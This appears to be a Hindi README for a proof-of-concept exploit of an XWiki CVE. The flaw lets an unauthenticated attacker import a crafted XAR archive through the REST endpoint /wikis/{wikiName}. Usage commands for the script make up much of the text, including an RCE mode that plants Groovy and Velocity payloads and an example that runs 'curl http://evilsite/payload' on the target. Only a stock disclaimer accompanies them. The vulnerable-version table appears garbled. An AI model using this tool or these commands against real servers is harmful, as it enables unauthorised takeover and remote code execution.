
XWiki Platform - CVE-2026-33137 PoC - REST /wikis/{wikiName} के माध्यम से बिना प्रमाणीकरण के XAR आयात
XWiki प्लेटफ़ॉर्म - REST /wikis/{wikiName} के माध्यम से अप्रमाणित XAR आयात
XWiki प्लेटफ़ॉर्म में POST /wikis/{wikiName} REST API एंडपॉइंट बिना कोई प्रमाणीकरण या प्राधिकरण जांच किए XAR (XWiki Archive) आयात निष्पादित करता है। एक अप्रमाणित हमलावर एक निर्मित XAR फ़ाइल भेजकर लक्ष्य विकि में मनमाने दस्तावेज़ बना या अपडेट कर सकता है।
AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| स्थिति | संस्करण |
|---|
| असुरक्षित | > 15.10.16, > 16.4.6, > 16.10.2 |
| पैच किया गया | 16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1 |
एक अप्रमाणित हमलावर निम्नलिखित कर सकता है:
REST एंडपॉइंट POST /xwiki/rest/wikis/{wikiName} अनुरोध निकाय में एक XAR फ़ाइल स्वीकार करता है और इसे सीधे विकि में आयात करता है, बिना यह जांचे कि अनुरोधकर्ता के पास ADMIN अधिकार हैं या नहीं। फिक्स (कमिट 4b7b95b) ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...) का उपयोग करके एक प्राधिकरण जांच जोड़ता है।
# Install requirements
pip install requests
# Basic usage
python poc.py -t http://target:8080
# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage
# Probe the target first
python poc.py -t http://target:8080 --probe
# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080
# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"
# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"
# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass
--rce)--rce फ़्लैग निर्दिष्ट कमांड स्ट्रिंग को निष्पादित करने वाले Groovy और Velocity पेलोड वाले पेज आयात करता है। यह स्वचालित रूप से:
{{groovy}} और {{velocity}} मैक्रोज़ में एम्बेडेड पेज आयात करता हैसफल RCE के लिए आवश्यकताएँ:
-u / --password के माध्यम से क्रेडेंशियल प्रदान किए गए हों)package.xml - पैकेज विवरणक{Space}/{Page}.xml - सामग्री के साथ दस्तावेज़ XMLयह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस एक्सप्लॉइट का उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।